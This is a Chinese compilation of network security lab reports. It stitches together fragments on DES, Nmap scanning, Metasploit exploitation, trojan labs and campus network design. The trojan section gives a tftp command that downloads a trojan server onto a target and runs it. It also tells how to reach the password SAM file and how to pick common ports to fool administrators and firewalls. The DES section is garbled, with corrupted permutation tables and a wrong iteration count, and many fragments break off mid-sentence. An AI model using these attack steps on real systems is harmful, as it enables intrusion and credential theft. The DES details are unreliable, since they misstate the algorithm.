计算机网络安全技术 实验报告

学号：班级：姓名：
实验三编写DES加密与解密程序
实验目的：(1)了解DES算法原理
(2)掌握编程实现DES加解密算法
(3)掌握DES加解密程序的使用.
实验要求:
编写DES加解密程序的要求:
1．按照DES加密算法编写DES加密程序
2．程序中给出明文及密钥的输入接口，并给出密文的输出（明文、密钥及密文都要求分别给出字符及二进制的输入、输出）
3．输出中间结果
输出16次迭代过程中中间结果的左32bit+右32bit=64bit
输出16个子密钥
实验内容：
(1)分别编写DES加密解密程序.
(2)对DES源程序进行编译、调试。

(3)将运行结果演示给教师,由教师进行打分.
(4)填写实验体会.
(5)提交源代码和实验报告.
实验体会：（记录完毕后，填写页眉的姓名班级学号，然后上传）。

网络安全实验总结5篇篇1一、引言随着信息技术的迅猛发展，网络安全问题日益受到重视。

为了提升自身对网络安全的理解和掌握，我们进行了一系列网络安全实验。

本文将对这些实验进行全面总结，旨在分析实验过程、总结实验成果，并提炼出对未来工作的启示。

二、实验过程1. 实验准备在实验开始前，我们进行了充分的准备工作。

首先，我们设计了一套全面的实验方案，明确了实验的目标、内容和方法。

其次，我们搭建了实验环境，包括配置了相应的网络设备、安装了必要的软件工具等。

最后，我们对参与实验的人员进行了培训，确保他们能够熟练掌握实验所需的技能和知识。

2. 实验实施在实验过程中，我们严格按照实验方案进行操作。

首先，我们对网络系统进行了全面的漏洞扫描，以发现潜在的安全隐患。

其次，我们针对发现的漏洞进行了详细的分析和评估，确定了漏洞的严重程度和可能带来的影响。

然后，我们根据漏洞分析的结果，制定了相应的修复方案，并对网络系统进行了及时的修复和加固。

此外，我们还进行了网络攻击模拟实验。

通过模拟常见的网络攻击场景，如暴力破解、SQL注入等，我们验证了网络系统的安全防护能力。

在模拟攻击过程中，我们发现了一些安全防护的不足之处，并及时进行了改进和优化。

三、实验成果通过本次网络安全实验，我们取得了以下成果：1. 提升了网络安全防护能力。

通过对网络系统的全面漏洞扫描和修复加固，我们显著提高了网络系统的安全性。

同时，通过模拟攻击实验，我们也发现了安全防护的不足之处，并进行了相应的改进和优化。

2. 增强了团队成员的网络安全意识。

通过实验前的培训和实验过程中的讨论与交流，团队成员对网络安全的重要性有了更深刻的认识，并掌握了一定的网络安全技能和知识。

3. 为未来的网络安全工作提供了有益的参考。

本次实验不仅提升了我们的网络安全防护能力还为我们提供了宝贵的实践经验为未来的网络安全工作奠定了坚实的基础。

四、启示与建议通过本次网络安全实验我们得到了以下启示和建议：1. 网络安全需要持续关注和重视。

网络安全基础实验报告实验目的：本实验旨在通过实践操作，掌握网络安全基础知识和技能，并了解并实践常见的网络安全攻防技术。

实验材料：1. 一台计算机2. 一台网络服务器3. 一台防火墙设备实验过程：1. 建立实验环境：将计算机、网络服务器和防火墙设备连接至同一局域网络中。

2. 实施攻击：使用计算机对网络服务器发起常见的网络攻击，如端口扫描、ARP欺骗、DDoS攻击等。

3. 监控防御：观察防火墙设备对攻击行为的识别和阻断情况，并分析攻击者的攻击手法和目的。

4. 实施防御：根据攻击行为和攻击者的目的，调整防火墙设备的配置，加强对网络服务器的防护能力，确保网络安全。

5. 检测恢复：使用网络安全检测工具对网络服务器进行检测，验证防火墙配置的有效性。

6. 总结分析：根据实验结果和经验，总结网络安全攻防的基本原则和技巧，并提出改进建议。

实验结果：1. 攻击行为识别和阻断情况良好，网络服务器受到的攻击次数明显减少。

2. 防火墙配置调整有效，网络服务器的安全性得到显著提升。

3. 防火墙检测工具显示网络服务器的安全性良好，未发现异常情况。

实验结论：通过本实验，成功掌握了网络安全基础知识和技能，并了解了常见的网络安全攻防技术。

通过合理配置防火墙设备，可以有效地防止网络攻击并维护网络安全。

改进建议：1. 进一步学习和研究网络安全领域的最新技术和攻防策略，及时更新防火墙设备的配置。

2. 定期进行网络安全演练和实践，提高网络安全防护意识和应急响应能力。

3. 加强对网络服务器的监控和日志管理，及时发现和处理安全事件。

4. 定期与网络安全专家进行交流和合作，共同提高网络安全防护水平。

计算机网络实验报告（6篇）计算机网络实验报告（通用6篇）计算机网络实验报告篇1一、实验目的1、熟悉微机的各个部件；2、掌握将各个部件组装成一台主机的方法和步骤；3、掌握每个部件的安装方法；4、了解微型计算机系统的基本配置；5、熟悉并掌握DOS操作系统的使用；6、掌握文件、目录、路径等概念；7、掌握常用虚拟机软件的安装和使用；8、熟悉并掌握虚拟机上WINDOWS操作系统的安装方法及使用；9、掌握使用启动U盘的制作和U盘安装windows操作系统的方法；10、了解WINDOWS操作系统的基本配置和优化方法。

二、实验内容1.将微机的各个部件组装成一台主机；2.调试机器，使其正常工作；3.了解计算机系统的基本配置。

4.安装及使用虚拟机软件；5.安装WINDOWS7操作系统；6.常用DOS命令的使用；7.学会制作启动U盘和使用方法；8.WINDOWS7的基本操作；9.操作系统的基本设置和优化。

三、实验步骤（参照实验指导书上的内容，结合实验过程中做的具体内容，完成此项内容的撰写）四、思考与总结（写实验的心得体会等）计算机网络实验报告篇2windows平台逻辑层数据恢复一、实验目的：通过运用软件R-Studio_5.0和winhe_对误格式化的硬盘或者其他设备进行数据恢复，通过实验了解windows平台逻辑层误格式化数据恢复原理，能够深入理解并掌握数据恢复软件的使用方法，并能熟练运用这些软件对存储设备设备进行数据恢复。

二、实验要求：运用软件R-Studio_5.0和winhe_对电脑磁盘或者自己的U盘中的删除的数据文件进行恢复，对各种文件进行多次尝试，音频文件、系统文件、文档文件等，对简单删除和格式化的磁盘文件分别恢复，并检查和验证恢复结果，分析两个软件的数据恢复功能差异与优势，进一步熟悉存储介质数据修复和恢复方法及过程，提高自身的对存储介质逻辑层恢复技能。

三、实验环境和设备：（1）Windows _P 或Windows 20__ Professional操作系统。

一、实验目的随着信息技术的飞速发展，计算机网络安全问题日益凸显。

为了提高学生的网络安全意识，掌握网络安全防护技能，本次实验旨在通过模拟网络安全攻击和防护，让学生了解网络安全的基本概念、攻击手段和防护措施，提高学生的网络安全防护能力。

二、实验环境1. 实验软件：Kali Linux（用于模拟攻击）、Metasploit（用于攻击工具）、Wireshark（用于网络数据包捕获与分析）2. 实验设备：两台计算机（一台作为攻击者，一台作为受害者）三、实验内容1. 网络扫描（1）使用Nmap扫描目标主机的开放端口，了解目标主机的基本信息。

（2）分析扫描结果，找出可能存在的安全漏洞。

2. 漏洞利用（1）针对目标主机发现的漏洞，利用Metasploit进行漏洞利用。

（2）分析攻击过程，了解漏洞利用的原理和技巧。

3. 数据包捕获与分析（1）使用Wireshark捕获攻击过程中的网络数据包。

（2）分析数据包内容，了解攻击者的攻击手法和目标主机的响应。

4. 防护措施（1）针对发现的漏洞，采取相应的防护措施，如更新系统补丁、关闭不必要的服务等。

（2）学习防火墙、入侵检测系统等网络安全设备的使用方法，提高网络安全防护能力。

四、实验步骤1. 准备实验环境（1）在攻击者和受害者主机上安装Kali Linux操作系统。

（2）配置网络，使两台主机处于同一局域网内。

2. 网络扫描（1）在攻击者主机上打开终端，输入命令“nmap -sP 192.168.1.1”进行扫描。

（2）查看扫描结果，了解目标主机的开放端口。

3. 漏洞利用（1）在攻击者主机上打开终端，输入命令“msfconsole”进入Metasploit。

（2）搜索目标主机存在的漏洞，如CVE-2017-5638。

（3）使用Metasploit中的CVE-2017-5638漏洞模块进行攻击。

4. 数据包捕获与分析（1）在受害者主机上打开Wireshark，选择正确的网络接口。

网络安全实验报告[共五篇]第一篇：网络安全实验报告实验一：网络扫描实验【实验目的】了解扫描的基本原理，掌握基本方法，最终巩固主机安全【实验内容】1、学习使用Nmap的使用方法2、学习使用漏洞扫描工具【实验环境】1、硬件 PC机一台。

2、系统配置：操作系统windows XP以上。

【实验步骤】1、端口扫描1）解压并安装ipscan15.zip，扫描本局域网内的主机2）解压nmap-4.00-win32.zip，安装WinPcap运行cmd.exe，熟悉nmap命令(详见“Nmap详解.mht”)。

3）试图做以下扫描：扫描局域网内存活主机，扫描某一台主机或某一个网段的开放端口扫描目标主机的操作系统试图使用Nmap的其他扫描方式，伪源地址、隐蔽扫描等2、漏洞扫描解压X-Scan-v3.3-cn.rar，运行程序xscan_gui.exe，将所有模块选择扫描，扫描本机，或局域网内某一台主机的漏洞【实验背景知识】1、扫描及漏洞扫描原理见第四章黑客攻击技术.ppt2、NMAP使用方法扫描器是帮助你了解自己系统的绝佳助手。

象Windows 2K/XP 这样复杂的操作系统支持应用软件打开数百个端口与其他客户程序或服务器通信，端口扫描是检测服务器上运行了哪些服务和应用、向Internet或其他网络开放了哪些联系通道的一种办法，不仅速度快，而且效果也很不错。

Nmap被开发用于允许系统管理员察看一个大的网络系统有哪些主机以及其上运行何种服务。

它支持多种协议的扫描如UDP，TCP connect(),TCP SYN(half open), ftp proxy(bounce attack),Reverse-ident, ICMP(ping sweep), FIN, ACK sweep,Xmas Tree, SYN sweep，1 和Null扫描。

可以从SCAN TYPES一节中察看相关细节。

Nmap还提供一些实用功能如通过tcp/ip来甄别操作系统类型、秘密扫描、动态延迟和重发、平行扫描、通过并行的PING侦测下属的主机、欺骗扫描、端口过滤探测、直接的RPC扫描、分布扫描、灵活的目标选择以及端口的描述。

网络安全实验报告一、实验目的：1.学习和掌握常见的网络攻击方式和防御方法。

2.增强对网络安全的意识和知识。

3.熟悉和操作网络安全工具。

4.提高实验操作能力和分析问题的能力。

二、实验环境：本实验使用的软硬件环境如下：1. 操作系统：Windows 10、Ubuntu 18.04.1 LTS。

2. 虚拟机软件：VMware Workstation 15 Pro。

3. 网络安全工具：Wireshark、Nmap、Metasploit、Kali Linux等。

三、实验内容：1. 网络嗅探实验：使用Wireshark工具嗅探网络数据包，分析其中的攻击行为，例如ARP欺骗、密码抓取等。

2. 端口扫描实验：使用Nmap工具对指定主机进行端口扫描，探测开放的服务和漏洞。

3. Metasploit实验：使用Metasploit工具进行系统渗透。

例如使用exploit模块攻击未安装安全补丁的目标主机，获取目标系统的权限。

4. DDOS攻击实验：使用Kali Linux工具进行DDOS攻击，测试目标主机的防御能力。

四、实验结果及分析：1. 网络嗅探实验：通过Wireshark工具分析网络数据包，发现有ARP欺骗行为。

针对这一问题，我们可以通过ARP防火墙来防止ARP欺骗攻击。

2. 端口扫描实验：使用Nmap工具扫描目标主机，发现其中有几个端口是开放的，可能存在风险。

针对这一问题，我们可以关闭不必要的服务，或者使用防火墙限制外部访问。

3. Metasploit实验：通过Metasploit工具成功攻击了一个未安装安全补丁的目标主机，并获取了目标系统的权限。

针对这一问题，我们可以及时安装系统安全补丁，加强系统的安全性。

4. DDOS攻击实验：使用Kali Linux工具进行DDOS攻击，测试目标主机的防御能力。

根据测试结果，目标主机并未能有效防御DDOS攻击，我们可以采用更加强大的防御措施来保护系统。

总结：通过本次实验，我们学习和掌握了常见的网络攻击方式和防御方法，并通过实际操作验证了网络安全工具的有效性。

《计算机网络安全》实验报告实验序号：7 实验项目名称：木马攻击与防范实验3）在此窗口中运行tftp -i 192.168.20.1 get g_server.exe将木马服务程序G_server.exe上传到靶机P3上，并直接输入g_server.exe步骤3：运行木马客户程序控制远程主机1）打开程序端程序，单击快捷工具栏中的“添加主机”按扭，如图8所示。

这时我们就可以像操作自己的电脑一样操作远程目标电脑，比如打开C:\WINNT\system32\config目录可以找到对方主机上保存用户口令的SAM文件。

点击鼠标右键，可以发现有上传和下载功能。

即可以随意将虚拟机器上的机密文件修改文件关联也是木马常用的手段，“冰河”将txt文件的缺省打开方式由实验任务二：“广外男生”木马“广外男生”的连接gwboy.exe，打开“广外男生”的主程序，主界面。

进行客户端设置。

依次单击“设置”－“客户端设置”，弹出客户端设置界面如图。

我们可以看到它采用“反弹窗口＋线程插入技术”的提示。

在“客户端最大连中填入允许多少台客户端主机来控制服务器端，注意不要太多，成服务器端主机死机。

在“客户端使用端口”填入服务器端连接到客户端的那个端这是迷惑远程服务器端主机管理员和防火墙的关键，填入一些常用端口，远程主机管理员和防火墙误以为连接的是个合法的程序。

比如使用端口手动删除“广外男生”木马“广外男生”木马除了可以采用防病毒软件查杀之外，还可以通过手动方法删除，具体手动删除步骤如下：（3）在注册表中依次单击“编辑”－“查找”，查找文件名为gwboydll.dll 的文件，找到后将相关注册表项全部删除。

南昌大学计算机网络安全实验报告范文-图文实实验课程：学生姓名：学号：专业班级：验报告计算机网络安全信念1314LOVE网络间谍088-1-目录一、实验一3二、实验二11三、实验三四、实验四2327-2-南昌大学实验报告一学生姓名：信念学号：1314LOVE专业班级：网络间谍088班实验类型：验证□综合□设计□创新实验日期:实验成绩：一、实验名称DES算法的实现二、实验目的通过用DES算法对实际的数据进行加密和解密来深刻了解DES的运行原理。

三、实验基本原理和内容1.DES算法详述DES算法把64位的明文输入块变为64位的密文输出块，它所使用的密钥也是64位,其功能是把输入的64位数据块按位重新组合，并把输出分为L0、R0两部分，每部分各长32位，其置换规则见下表：58,50,12,34,26,18,10,2,60,52,44,36,28,20,12,4,62,54,46,38,30,22,14,6,64,56,48,40,32,24,16,8,57,49,41,33,25,17,9,1,59,51,43,3 5,27,19,11,3,61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7,即将输入的第58位换到第一位，第50位换到第2位，，依此类推，最后一位是原来的第7位。

L0、R0则是换位输出后的两部分，L0是输出的左32位，R0是右32位，例：设置换前的输入值为D1D2D3D64，则经过初始置换后的结果为：L0=D550D8；R0=D57D49 (7)经过26次迭代运算后，得到L16、R16，将此作为输入，进行逆置换，即得到密文输出。

逆置换正好是初始置的逆运算，例如，第1位经过初始置换后，处于第40位，而通过逆置换，又将第40位换回到第1位，其逆置换规则如下表所示：40,8,48,16,56,24,64,32,39,7,47,15,55,23,63,31,38,6,46,14,54, 22,62,30,37,5,45,13,53,21,61,29,36,4,44,12,52,20,60,28,35,3,43,1 1,51,19,59,27,34,2,42,10,50,18,5826,33,1,41,9,49,17,57,25,放大换位表32,1,2,3,4,5,4,5,6,7,8,9,8,9,10,11,12,13,12,13,14,15,16,17,16,17,18,19,20,21,20,21,22,23,24,25, 24,25,26,27,28,29,28,29,30,31,32,1,单纯换位表16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10,2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25,在f（Ri,Ki）算法描述图中，S1,S2...S8为选择函数，其功能是把6bit数据变为4bit数据。

计算机网络实验报告计算机网络实验报告(通用7篇)在经济飞速发展的今天，报告使用的次数愈发增长，其在写作上有一定的技巧。

我敢肯定，大部分人都对写报告很是头疼的，以下是小编收集整理的计算机网络实验报告，希望对大家有所帮助。

计算机网络实验报告1一、需求分析建设一个以办公自动化、计算机辅助教学、现代计算机校园文化为核心，以现代网络技术为依托，技术先进、扩展性强、能覆盖全校主要楼宇的校园主干网络，将学校的各种pc机、工作站、终端设备和局域网连接起来，并与有关广域网相连，在网上宣传自己和获取Internet网上的教育资源。

形成结构合理，内外沟通的校园计算机系统，在此基础上建立满足教学、研究和管理工作需要的软硬件环境，开发各类信息库和应用系统，为学校各类人员提供充分的网络信息服务。

系统总体设计将本着总体规划、分步实施的原则，充分体现系统的技术先进性、高度的安全可靠性，同时具有良好的开放性、可扩展性、冗余性。

本着为学校着想，合理使用建设资金，使系统经济可行。

具体包括下以几个方面:1、内网络能够高速访问FTP服务器现在或上传文件实现资源共享功能，实现对不同类型的用户划分不同的权限,限制不同类型的用户只能访问特定的服务资源。

可以下载和上传资料文件，访问速度可以对指定的用户进行级别的划分。

2、建设Web服务器对外实现信息发布，对内实现教学教务管理。

网站发布学校新闻、通知、学校的活动等相关内容。

实现学生能够在网上进行成绩查询、网上报名、网上评教等功能；以及教师的信息查询、教学数据上传等。

3、建设邮件服务器以满足校园内部之间和内、外网这间的大量邮件传输的需求。

4、实现内网划分多个VLAN，实现校园内不同校区，不同楼宇，不同楼层的多客户接入。

5、内部实现PC间实现高速互访，同时可以访问互联网。

网络内同一IP段内的PC机可以通过网上邻居实现高速互访，传送资料文件等，解决不同楼宇，不同楼层之间通过移动存储设备传送数据费时、费力的问题。